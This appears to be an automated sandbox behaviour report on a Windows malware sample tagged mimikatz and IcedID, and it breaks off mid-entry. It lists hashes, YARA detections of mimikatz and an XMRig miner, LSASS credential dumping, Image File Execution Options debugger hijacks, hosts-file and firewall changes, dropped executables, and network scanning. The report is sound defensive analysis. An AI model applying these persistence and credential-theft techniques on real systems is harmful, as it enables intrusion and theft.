Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
24-09-2024 22:43
Behavioral task
behavioral1
Sample
2024-09-24_7007b9768f58f15f8a549db38beb005f_hacktools_icedid_mimikatz.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
2024-09-24_7007b9768f58f15f8a549db38beb005f_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20240802-en
General
-
Target
2024-09-24_7007b9768f58f15f8a549db38beb005f_hacktools_icedid_mimikatz.exe
-
Size
10.8MB
-
MD5
7007b9768f58f15f8a549db38beb005f
-
SHA1
5355eac95e58e136fcdef9fb77ffe913df83515f
-
SHA256
97dde424dd8e41f3d3f516cad2b476eefb0e31d9fcc818f832f1feb8a0f585b4
-
SHA512
f33e6cc7b93c85105b83d2980880fbff2d98c3fda1750afb3cd97ef7d76d8d2737716b48e6411ed561ff94299bdece52e45067371058e46c359c9f884838d6d2
-
SSDEEP
98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2560 created 348 2560 ebayich.exe 17 -
Contacts a large (18099) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 10 IoCs
resource yara_rule behavioral1/memory/1492-192-0x000000013F040000-0x000000013F160000-memory.dmp xmrig behavioral1/memory/1492-201-0x000000013F040000-0x000000013F160000-memory.dmp xmrig behavioral1/memory/1492-223-0x000000013F040000-0x000000013F160000-memory.dmp xmrig behavioral1/memory/1492-229-0x000000013F040000-0x000000013F160000-memory.dmp xmrig behavioral1/memory/1492-230-0x000000013F040000-0x000000013F160000-memory.dmp xmrig behavioral1/memory/1492-231-0x000000013F040000-0x000000013F160000-memory.dmp xmrig behavioral1/memory/1492-247-0x000000013F040000-0x000000013F160000-memory.dmp xmrig behavioral1/memory/1492-255-0x000000013F040000-0x000000013F160000-memory.dmp xmrig behavioral1/memory/1492-277-0x000000013F040000-0x000000013F160000-memory.dmp xmrig behavioral1/memory/1492-387-0x000000013F040000-0x000000013F160000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral1/memory/2276-0-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral1/memory/2276-4-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral1/files/0x0008000000016dff-5.dat mimikatz behavioral1/memory/2656-9-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral1/memory/2000-138-0x000000013F670000-0x000000013F75E000-memory.dmp mimikatz -
Drops file in Drivers directory 2 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts ebayich.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe ebayich.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ebayich.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe ebayich.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ebayich.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe ebayich.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe ebayich.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ebayich.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ebayich.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ebayich.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ebayich.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe ebayich.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe ebayich.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe ebayich.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ebayich.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe ebayich.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe ebayich.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe ebayich.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ebayich.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe ebayich.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe ebayich.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ebayich.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ebayich.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe ebayich.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ebayich.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe ebayich.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ebayich.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ebayich.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ebayich.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe ebayich.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ebayich.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe ebayich.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ebayich.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe ebayich.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ebayich.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ebayich.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe ebayich.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ebayich.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe ebayich.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe ebayich.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ebayich.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 2976 netsh.exe 836 netsh.exe -
Executes dropped EXE 18 IoCs
pid Process 2656 ebayich.exe 2560 ebayich.exe 2600 wpcap.exe 2484 bitlsiizm.exe 2000 vfshost.exe 1780 xohudmc.exe 1812 huzbeq.exe 696 ynzstygee.exe 1492 gclpbv.exe 1992 ynzstygee.exe 2688 ynzstygee.exe 2556 ynzstygee.exe 3044 ynzstygee.exe 2636 ynzstygee.exe 1648 ynzstygee.exe 2864 ebayich.exe 1536 nnytgmett.exe 1692 ebayich.exe -
Loads dropped DLL 24 IoCs
pid Process 2756 cmd.exe 2756 cmd.exe 572 cmd.exe 2600 wpcap.exe 2600 wpcap.exe 2600 wpcap.exe 2600 wpcap.exe 2600 wpcap.exe 1640 cmd.exe 2484 bitlsiizm.exe 2484 bitlsiizm.exe 2304 cmd.exe 2304 cmd.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 1304 cmd.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 19 ifconfig.me 20 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 12 IoCs
description ioc Process File created C:\Windows\system32\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\huzbeq.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\huzbeq.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDAB91A53CE5876D153BF0B6B3BA7DCE ebayich.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDAB91A53CE5876D153BF0B6B3BA7DCE ebayich.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat ebayich.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 ebayich.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 ebayich.exe -
resource yara_rule behavioral1/files/0x000500000001a488-130.dat upx behavioral1/memory/2000-135-0x000000013F670000-0x000000013F75E000-memory.dmp upx behavioral1/memory/2000-138-0x000000013F670000-0x000000013F75E000-memory.dmp upx behavioral1/files/0x000500000001a4f3-158.dat upx behavioral1/memory/696-162-0x000000013FC40000-0x000000013FC9B000-memory.dmp upx behavioral1/files/0x000500000001a4f9-165.dat upx behavioral1/memory/1492-169-0x000000013F040000-0x000000013F160000-memory.dmp upx behavioral1/memory/2560-168-0x0000000002D70000-0x0000000002E90000-memory.dmp upx behavioral1/memory/696-173-0x000000013FC40000-0x000000013FC9B000-memory.dmp upx behavioral1/memory/2560-178-0x0000000001A30000-0x0000000001A8B000-memory.dmp upx behavioral1/memory/1992-180-0x000000013F1A0000-0x000000013F1FB000-memory.dmp upx behavioral1/memory/2688-187-0x000000013FD70000-0x000000013FDCB000-memory.dmp upx behavioral1/memory/2688-190-0x000000013FD70000-0x000000013FDCB000-memory.dmp upx behavioral1/memory/1492-192-0x000000013F040000-0x000000013F160000-memory.dmp upx behavioral1/memory/2556-197-0x000000013FB50000-0x000000013FBAB000-memory.dmp upx behavioral1/memory/2560-195-0x0000000001A30000-0x0000000001A8B000-memory.dmp upx behavioral1/memory/2556-199-0x000000013FB50000-0x000000013FBAB000-memory.dmp upx behavioral1/memory/1492-201-0x000000013F040000-0x000000013F160000-memory.dmp upx behavioral1/memory/2560-203-0x0000000001A30000-0x0000000001A8B000-memory.dmp upx behavioral1/memory/3044-207-0x000000013F910000-0x000000013F96B000-memory.dmp upx behavioral1/memory/2636-212-0x000000013F980000-0x000000013F9DB000-memory.dmp upx behavioral1/memory/2636-214-0x000000013F980000-0x000000013F9DB000-memory.dmp upx behavioral1/memory/2560-218-0x0000000001830000-0x000000000188B000-memory.dmp upx behavioral1/memory/1648-221-0x000000013FE90000-0x000000013FEEB000-memory.dmp upx behavioral1/memory/1492-223-0x000000013F040000-0x000000013F160000-memory.dmp upx behavioral1/memory/1492-229-0x000000013F040000-0x000000013F160000-memory.dmp upx behavioral1/memory/1492-230-0x000000013F040000-0x000000013F160000-memory.dmp upx behavioral1/memory/1492-231-0x000000013F040000-0x000000013F160000-memory.dmp upx behavioral1/memory/1492-247-0x000000013F040000-0x000000013F160000-memory.dmp upx behavioral1/memory/1492-255-0x000000013F040000-0x000000013F160000-memory.dmp upx behavioral1/memory/1492-277-0x000000013F040000-0x000000013F160000-memory.dmp upx behavioral1/memory/1492-387-0x000000013F040000-0x000000013F160000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\ksbgbtile\UnattendGC\specials\cnli-1.dll ebayich.exe File created C:\Windows\ksbgbtile\UnattendGC\specials\zlib1.dll ebayich.exe File opened for modification C:\Windows\ksbgbtile\Corporate\log.txt cmd.exe File created C:\Windows\ksbgbtile\vemyngcfm\nnytgmett.exe ebayich.exe File created C:\Windows\ksbgbtile\UnattendGC\specials\libeay32.dll ebayich.exe File created C:\Windows\ksbgbtile\UnattendGC\specials\ucl.dll ebayich.exe File created C:\Windows\ksbgbtile\UnattendGC\schoedcl.xml ebayich.exe File created C:\Windows\ksbgbtile\UnattendGC\specials\spoolsrv.xml ebayich.exe File created C:\Windows\ime\ebayich.exe ebayich.exe File created C:\Windows\ksbgbtile\UnattendGC\specials\exma-1.dll ebayich.exe File created C:\Windows\ksbgbtile\UnattendGC\specials\tucl-1.dll ebayich.exe File created C:\Windows\ksbgbtile\UnattendGC\specials\vimpcsvc.xml ebayich.exe File created C:\Windows\ksbgbtile\vemyngcfm\scan.bat ebayich.exe File created C:\Windows\ksbgbtile\vemyngcfm\wpcap.dll ebayich.exe File created C:\Windows\enveqymf\docmicfg.xml ebayich.exe File opened for modification C:\Windows\enveqymf\ebayich.exe 2024-09-24_7007b9768f58f15f8a549db38beb005f_hacktools_icedid_mimikatz.exe File created C:\Windows\enveqymf\schoedcl.xml ebayich.exe File opened for modification C:\Windows\enveqymf\spoolsrv.xml ebayich.exe File opened for modification C:\Windows\enveqymf\vimpcsvc.xml ebayich.exe File created C:\Windows\ksbgbtile\UnattendGC\svschost.xml ebayich.exe File opened for modification C:\Windows\enveqymf\svschost.xml ebayich.exe File created C:\Windows\ksbgbtile\UnattendGC\specials\spoolsrv.exe ebayich.exe File created C:\Windows\ksbgbtile\UnattendGC\specials\schoedcl.exe ebayich.exe File created C:\Windows\ksbgbtile\UnattendGC\vimpcsvc.xml ebayich.exe File created C:\Windows\ksbgbtile\UnattendGC\docmicfg.xml ebayich.exe File created C:\Windows\enveqymf\svschost.xml ebayich.exe File created C:\Windows\ksbgbtile\UnattendGC\Shellcode.ini ebayich.exe File created C:\Windows\enveqymf\ebayich.exe 2024-09-24_7007b9768f58f15f8a549db38beb005f_hacktools_icedid_mimikatz.exe File created C:\Windows\ksbgbtile\UnattendGC\specials\tibe-2.dll ebayich.exe File created C:\Windows\ksbgbtile\UnattendGC\specials\svschost.xml ebayich.exe File created C:\Windows\ksbgbtile\Corporate\mimilib.dll ebayich.exe File created C:\Windows\ksbgbtile\UnattendGC\specials\coli-0.dll ebayich.exe File created C:\Windows\ksbgbtile\UnattendGC\specials\crli-0.dll ebayich.exe File created C:\Windows\ksbgbtile\UnattendGC\specials\trch-1.dll ebayich.exe File created C:\Windows\ksbgbtile\UnattendGC\specials\trfo-2.dll ebayich.exe File created C:\Windows\ksbgbtile\UnattendGC\AppCapture64.dll ebayich.exe File created C:\Windows\ksbgbtile\Corporate\vfshost.exe ebayich.exe File created C:\Windows\ksbgbtile\UnattendGC\specials\posh-0.dll ebayich.exe File created C:\Windows\ksbgbtile\UnattendGC\specials\xdvl-0.dll ebayich.exe File created C:\Windows\ksbgbtile\UnattendGC\specials\vimpcsvc.exe ebayich.exe File created C:\Windows\ksbgbtile\vemyngcfm\bitlsiizm.exe ebayich.exe File created C:\Windows\ksbgbtile\UnattendGC\specials\svschost.exe ebayich.exe File created C:\Windows\ksbgbtile\UnattendGC\specials\schoedcl.xml ebayich.exe File opened for modification C:\Windows\enveqymf\docmicfg.xml ebayich.exe File created C:\Windows\ksbgbtile\vemyngcfm\ip.txt ebayich.exe File created C:\Windows\ksbgbtile\UnattendGC\specials\docmicfg.exe ebayich.exe File created C:\Windows\ksbgbtile\UnattendGC\spoolsrv.xml ebayich.exe File created C:\Windows\enveqymf\spoolsrv.xml ebayich.exe File opened for modification C:\Windows\enveqymf\schoedcl.xml ebayich.exe File created C:\Windows\ksbgbtile\Corporate\mimidrv.sys ebayich.exe File opened for modification C:\Windows\ksbgbtile\vemyngcfm\Result.txt nnytgmett.exe File created C:\Windows\ksbgbtile\vemyngcfm\Packet.dll ebayich.exe File created C:\Windows\ksbgbtile\UnattendGC\specials\libxml2.dll ebayich.exe File created C:\Windows\ksbgbtile\vemyngcfm\wpcap.exe ebayich.exe File opened for modification C:\Windows\ksbgbtile\vemyngcfm\Packet.dll ebayich.exe File created C:\Windows\ksbgbtile\UnattendGC\specials\ssleay32.dll ebayich.exe File created C:\Windows\ksbgbtile\UnattendGC\specials\docmicfg.xml ebayich.exe File created C:\Windows\ksbgbtile\UnattendGC\AppCapture32.dll ebayich.exe File created C:\Windows\enveqymf\vimpcsvc.xml ebayich.exe File created C:\Windows\ksbgbtile\upbdrjv\swrpwe.exe ebayich.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 552 sc.exe 1876 sc.exe 964 sc.exe 888 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language huzbeq.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ebayich.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2024-09-24_7007b9768f58f15f8a549db38beb005f_hacktools_icedid_mimikatz.exe Key opened 